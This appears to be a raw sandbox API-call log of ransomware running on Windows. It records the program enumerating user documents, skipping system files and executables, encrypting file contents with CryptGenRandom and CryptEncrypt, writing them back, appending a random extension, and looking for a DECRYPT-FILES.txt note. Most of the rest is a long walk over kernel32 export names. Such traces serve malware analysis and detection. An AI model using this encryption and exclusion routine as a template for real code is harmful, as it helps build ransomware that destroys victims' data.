wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf.d2OMH1") returned 79 [0084.841] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\yefeah28pgy.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf.d2OMH1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\yefeah28pgy.pdf.d2omh1"), dwFlags=0x0) returned 1 [0084.846] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.846] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.846] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.846] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x656f2540, ftCreationTime.dwHighDateTime=0x1d4ca34, ftLastAccessTime.dwLowDateTime=0x6ab21a80, ftLastAccessTime.dwHighDateTime=0x1d4d146, ftLastWriteTime.dwLowDateTime=0x6ab21a80, ftLastWriteTime.dwHighDateTime=0x1d4d146, nFileSizeHigh=0x0, nFileSizeLow=0x154ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="YeFEah28pGy.pdf", cAlternateFileName="YEFEAH~1.PDF")) returned 0 [0084.847] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0084.847] CloseHandle (hObject=0x410) returned 1 [0084.847] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fb43640, ftCreationTime.dwHighDateTime=0x1d54e99, ftLastAccessTime.dwLowDateTime=0x7874d40, ftLastAccessTime.dwHighDateTime=0x1d54dd8, ftLastWriteTime.dwLowDateTime=0x7874d40, ftLastWriteTime.dwHighDateTime=0x1d54dd8, nFileSizeHigh=0x0, nFileSizeLow=0x18fcb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Txzpa.docx", cAlternateFileName="TXZPA~1.DOC")) returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="autorun.inf") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="boot.ini") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="desktop.ini") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="ntuser.dat") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="iconcache.db") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="bootsect.bak") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="ntuser.dat.log") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="thumbs.db") returned 1 [0084.847] lstrcmpiW (lpString1="Txzpa.docx", lpString2="Bootfont.bin") returned 1 [0084.847] lstrlenW (lpString="Txzpa.docx") returned 10 [0084.847] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.847] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.847] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.847] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.847] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.847] lstrlenW (lpString="Txzpa.docx") returned 10 [0084.848] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.848] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Txzpa.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx" [0084.848] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Txzpa.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\txzpa.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.848] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=102347) returned 1 [0084.848] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.848] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.849] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.849] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.849] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.849] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.849] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.851] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.851] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.852] CloseHandle (hObject=0x414) returned 1 [0084.853] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.853] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.856] CloseHandle (hObject=0x0) returned 0 [0084.856] CloseHandle (hObject=0x410) returned 1 [0084.856] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.856] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.857] GetTickCount () returned 0x114dac6 [0084.857] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.857] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.857] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.857] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.857] lstrlenA (lpString="kernel32.dll") returned 12 [0084.858] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.858] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.858] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.858] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.858] lstrlenA (lpString="ADDATOMA") returned 8 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.858] lstrlenA (lpString="ADDATOMW") returned 8 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.858] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.858] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.858] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.858] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.858] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.858] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.858] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.858] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.858] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.858] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.859] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.859] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.859] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.859] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.859] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.859] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.859] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.859] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.859] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.859] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.859] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.859] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.859] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.859] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.859] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.859] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.859] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.859] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.859] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.860] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.860] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.860] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.860] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.860] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.860] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.860] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.860] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.860] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.860] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.860] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.860] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.860] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.860] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.861] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.861] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.861] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.861] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.861] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.861] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.861] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.861] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.861] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.861] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.861] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.861] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.861] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.861] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.861] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.861] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.861] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.862] lstrlenA (lpString="BEEP") returned 4 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.862] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.862] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.862] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.862] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.862] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.862] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.862] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.862] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.862] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.862] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.862] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.862] lstrlenA (lpString="CANCELIO") returned 8 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.862] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.862] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.862] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.862] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.862] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.862] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.863] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.863] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.863] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.863] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.863] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.863] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.863] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.863] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.863] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.863] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.863] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.863] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.863] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.863] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.863] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.863] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") 